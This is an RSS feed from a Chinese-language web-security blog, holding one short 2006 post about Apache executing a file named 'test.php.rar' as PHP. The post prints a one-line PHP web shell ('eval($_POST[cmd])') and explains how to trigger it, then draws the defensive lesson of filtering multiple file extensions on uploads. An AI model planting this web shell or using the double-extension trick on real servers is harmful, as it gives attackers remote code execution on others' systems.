<?xml version="1.0" encoding="utf-8"?><?xml-stylesheet type='text/xsl' href='http://jyqx.spaces.live.com/mmm2008-07-24_12.50/rsspretty.aspx?rssquery=en-US;http%3a%2f%2fjyqx.spaces.live.com%2fcategory%2fweb%e5%ae%89%e5%85%a8%e4%b8%93%e9%a2%98%2ffeed.rss' version='1.0'?><rss version="2.0" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:msn="http://schemas.microsoft.com/msn/spaces/2005/rss" xmlns:live="http://schemas.microsoft.com/live/spaces/2006/rss" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:cf="http://www.microsoft.com/schemas/rss/core/2005" xmlns:wfw="http://wellformedweb.org/CommentAPI/"><channel><title>金颖的日志: web安全专题</title><description /><link>http://jyqx.spaces.live.com/?_c11_BlogPart_BlogPart=blogview&amp;_c=BlogPart&amp;partqs=catweb%25E5%25AE%2589%25E5%2585%25A8%25E4%25B8%2593%25E9%25A2%2598</link><language>en-US</language><pubDate>Fri, 08 Aug 2008 02:40:04 GMT</pubDate><lastBuildDate>Fri, 08 Aug 2008 02:40:04 GMT</lastBuildDate><generator>Microsoft Spaces v1.1</generator><docs>http://www.rssboard.org/rss-specification</docs><ttl>60</ttl><cf:parentRSS>http://jyqx.spaces.live.com/blog/feed.rss</cf:parentRSS><live:type>blogcategory</live:type><live:identity><live:id>-434847513997895356</live:id><live:alias>jyqx</live:alias></live:identity><cf:listinfo><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="typelabel" label="Type" /><cf:group ns="http://schemas.microsoft.com/live/spaces/2006/rss" element="tag" label="Tag" /><cf:group element="category" label="Category" /><cf:sort element="pubDate" label="Date" data-type="date" default="true" /><cf:sort element="title" label="Title" data-type="string" /><cf:sort ns="http://purl.org/rss/1.0/modules/slash/" element="comments" label="Comments" data-type="number" /></cf:listinfo><item><title>极其危险的.php.rar漏洞</title><link>http://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry</link><description>&lt;div&gt;大家可以尝试编写如下内容的一个php文件，打包成test.php.rar,放到web目录下面，比如&lt;a href="http://localhost/test.php.rar"&gt;http://localhost/test.php.rar&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;&amp;lt;?php eval($_POST[cmd]);?&amp;gt;&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;然后你可以试试把phpinfo();post到上面的地址，怎么样，，，惊讶了吧，压缩包里面的代码被服务器执行了！&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;这个漏洞也提醒我们，以后处理上传的时候一定要过滤多个后缀&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;
&lt;div&gt;我是在windows＋apache下面测试的，如果大家测试没测出问题别拿鸡蛋扔我啊&lt;/div&gt;
&lt;div&gt; &lt;/div&gt;&lt;/div&gt;&lt;img src="http://c.services.spaces.live.com/CollectionWebService/c.gif?cid=-434847513997895356&amp;page=RSS%3a+%e6%9e%81%e5%85%b6%e5%8d%b1%e9%99%a9%e7%9a%84.php.rar%e6%bc%8f%e6%b4%9e&amp;referrer=" width="1px" height="1px" border="0" alt=""&gt;&lt;img style="position:absolute" alt="" width="0px" height="0px" src="http://c.live.com/c.gif?NC=31263&amp;amp;NA=1149&amp;amp;PI=73329&amp;amp;RF=&amp;amp;DI=3919&amp;amp;PS=85545&amp;amp;TP=jyqx.spaces.live.com&amp;amp;GT1=jyqx"&gt;</description><comments>http://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry#comment</comments><guid isPermaLink="true">http://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry</guid><pubDate>Wed, 26 Jul 2006 03:32:50 GMT</pubDate><slash:comments>0</slash:comments><msn:type>blogentry</msn:type><live:type>blogentry</live:type><live:typelabel>Blog entry</live:typelabel><wfw:commentRss>http://jyqx.spaces.live.com/blog/cns!F9F71C7D6CB19944!194/comments/feed.rss</wfw:commentRss><wfw:comment>http://jyqx.spaces.live.com/Blog/cns!F9F71C7D6CB19944!194.entry#comment</wfw:comment><dcterms:modified>2006-07-26T03:32:50Z</dcterms:modified></item></channel></rss>